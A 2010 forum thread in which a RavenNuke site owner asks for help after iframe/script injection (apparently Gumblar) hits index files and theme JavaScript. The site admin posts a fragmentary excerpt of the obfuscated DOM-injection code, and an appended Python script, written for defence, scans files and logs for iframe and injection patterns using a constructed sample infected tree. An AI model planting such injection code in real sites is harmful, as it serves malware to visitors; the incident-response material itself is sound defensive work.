hopper
New Member
Joined: Dec 05, 2007
Posts: 12
Posted: Thu Mar 04, 2010 5:30 pm
Hello
I use RN 2.30.02
Yesterday my site went down. So I contacted my host and they rebooted the server. After the reboot everything seemed fine until I started seeing that some of my modules had no content in them; they were just blank. After checking the index files of those modules I saw that there were some scripts at the bottom of all my index files.
At this moment I was saying to myself it has to be an iframe attack, because yes, those modules that were not working did indeed have iframe code in the index files.
I contacted my host that this could possibly be an IFRAME attack and asked them if they could check the log files to determine what was initially exploited. They wrote back to me:
Code:
Going through your user(s)' auth logs I found the following which may be indicative of a password intrusion:
148 IPs have logged into user **** from 17 identified countries within the last 30 days, including:
The countries that have logged into your user are:
29 Turkey
27 Canada
26 Netherlands
21 unknown
20 Germany
19 Ukraine
18 France
18 Portugal
17 Russian Federation
17 United Kingdom
16 Sweden
16 Spain
15 Slovakia
15 Singapore
15 Romania
13 United States
12 Latvia
9 Macedonia, the Former Yugoslav Republic of
This may indicate that your password has been compromised.
They gave me some steps to follow, which I have done:
I scanned all PCs that connect to my host; nothing found.
I changed my FTP password.
I changed my CP password.
I changed my database password.
They told me to stop using FTP and use SFTP/SSH instead (I didn't know FTP sends your password over the internet in plain text).
I have some questions. Did the intruder do an iframe attack after they had gotten the password? Or is this some other type of hack they added to my site?
Is it safe to have my site open for visitors?
I will now start replacing the files that were infected. However, they told me that usually the intruder will leave some type of file somewhere in my site so that they can re-exploit it later on down the line. I am having trouble finding this file.
Can this file be anywhere, like in a sub-domain, or hidden deep in any random folder?
Also, can I just remove the script code from the files, or should I replace them with a backup?
Sorry for the wall of text and all the questions. If anyone needs the code that was added I will be glad to send it.
Thanks all for your time.
__Hopper___
Raven
Site Admin/Owner
Joined: Aug 27, 2002
Posts: 17088
Posted: Sat Mar 06, 2010 12:04 am
Without seeing the code I am unable to respond to what type of attack was used.
However, those IPs and/or countries (in and of themselves) do not constitute any reason to jump to the conclusion that your password has been compromised. I have seen many site attacks/break-ins without any compromise of a userid or password. Usually the break-in is a result of an insecure phpNuke application that allows uploads. Once the file is uploaded then most anything is possible. Are you using any applications that allow uploading? If so, that would be the first place that I would look. I would also scan your server logs for URLs that contain the words del, delete, unlink, remove.
Please email, to me, the code that you have found and I may be able to tell you more.
hopper
Posted: Sat Mar 06, 2010 1:34 pm
Thanks for replying.
Can you please PM me your email address? I couldn't find it. I don't want to PM you the code and possibly get banned from the site. I don't think I allow uploads on my site, at least that I know of.
I have had my site down because 2 members from my site told me their Symantec was giving them a warning about a Gumblar trojan... it wanted them to download a virus cleaner.
So far I have found the code in all index files, mainfile.php and in JavaScript files of my theme folder. I think I have got everything, but I have been double and triple checking all the files, just to be sure.
Thanks
Raven
Posted: Sat Mar 06, 2010 2:18 pm
Please email the code as a zip file attachment to raven __AT__ ravenphpscripts __DOT__ com
hopper
Posted: Sat Mar 06, 2010 2:39 pm
OK, thanks.
I have sent you the email.
Raven
Posted: Sat Mar 06, 2010 6:08 pm
Got it and will look at it as soon as I can. Thanks.
Raven
Posted: Sat Mar 06, 2010 6:39 pm
Please email to me the URL for your site.
Also, for everyone's benefit, here is the result of the JS. This is just an excerpt. It assembles/creates a link and adds it via the DOM once the onload event fires.
Code:
m=document.createElement(a);
var Qj=new String();
var HG;
if(HG!='' && HG!='Ur'){
HG=''
}; /** SEMI-COLON OUT OF PLACE **/
m[g]=[1,6][0];
var Ld='';
m[V]=kA;
var So=new Date();
var Qd='';
this.Fd="";
document.body.appendChild(m);
Here is what it all translates to/as:
BTW: Is your URL in that virus-related URL?
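An added, defender-side sweep (example code, not anything from this thread or from RavenNuke) covering the two checks discussed in Raven's replies: it flags PHP/JS/HTML files under a webroot that carry an appended `<iframe>` or the createElement/appendChild DOM-injection pattern in the excerpt above, and scans access-log lines for the request keywords Raven suggests grepping for. The sample webroot, its file contents and the log lines are constructed; a hit is a lead to diff against a clean backup, not proof of compromise.

```python
import os
import re
import tempfile

# Injection types from the thread: an appended hidden <iframe>, and the createElement/appendChild DOM trick in theme JS.
INJECT_PATTERNS = {
    "iframe": re.compile(r"<iframe\b[^>]*>", re.I),
    "dom_inject": re.compile(r"document\.createElement\([^)]*\)[\s\S]{0,400}?\.appendChild\(", re.I),
}
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+)')  # request target in a combined-format log line
LOG_KEYWORDS = re.compile(r"\b(delete|del|unlink|remove)\b", re.I)  # words Raven suggests grepping for

def scan_webroot(root):
    """Return {relative_path: [pattern names]} for every PHP/JS/HTML file that matches."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".php", ".js", ".html", ".htm")):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            found = [n for n, pat in INJECT_PATTERNS.items() if pat.search(text)]
            if found:  # a match is a triage lead, not proof: diff the file against a clean backup
                hits[os.path.relpath(path, root).replace(os.sep, "/")] = found
    return hits

def scan_access_log(lines):
    """Return (line_number, keyword) for every request URL containing one of the keywords."""
    hits = []
    for i, line in enumerate(lines, 1):
        req = REQUEST.search(line)
        if req and (m := LOG_KEYWORDS.search(req.group(1))):
            hits.append((i, m.group(1).lower()))
    return hits

def demo():
    root = tempfile.mkdtemp()
    files = {  # constructed samples: clean module, module with appended iframe, injected theme JS
        "index.php": "<?php\necho 'hello';\n",
        "modules/News/index.php": '<?php\necho "news";\n<iframe src="http://example.invalid/x" width=1 height=1></iframe>\n',
        "themes/Mine/theme.js": "m=document.createElement(a);\nm[V]=kA;\ndocument.body.appendChild(m);\n",
    }
    for rel, body in files.items():
        os.makedirs(os.path.dirname(os.path.join(root, rel)), exist_ok=True)
        with open(os.path.join(root, rel), "w") as fh:
            fh.write(body)
    log = ['10.0.0.1 - - [04/Mar/2010:10:00:00 +0000] "GET /modules.php?name=News HTTP/1.1" 200 512',  # constructed
           '10.0.0.2 - - [04/Mar/2010:10:01:00 +0000] "GET /upload.php?action=unlink&f=a HTTP/1.1" 200 33']
    return scan_webroot(root), scan_access_log(log)
```

Run `demo()` against the constructed tree to see both reports; point `scan_webroot` at a real webroot and `scan_access_log` at `open(logfile)` to use it for a sweep.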
hopper
Posted: Mon Mar 08, 2010 10:00 pm
Thanks for looking into this, Raven.
No, my site is not related to that URL and is not in that URL.
I will email you my URL right now.
Thanks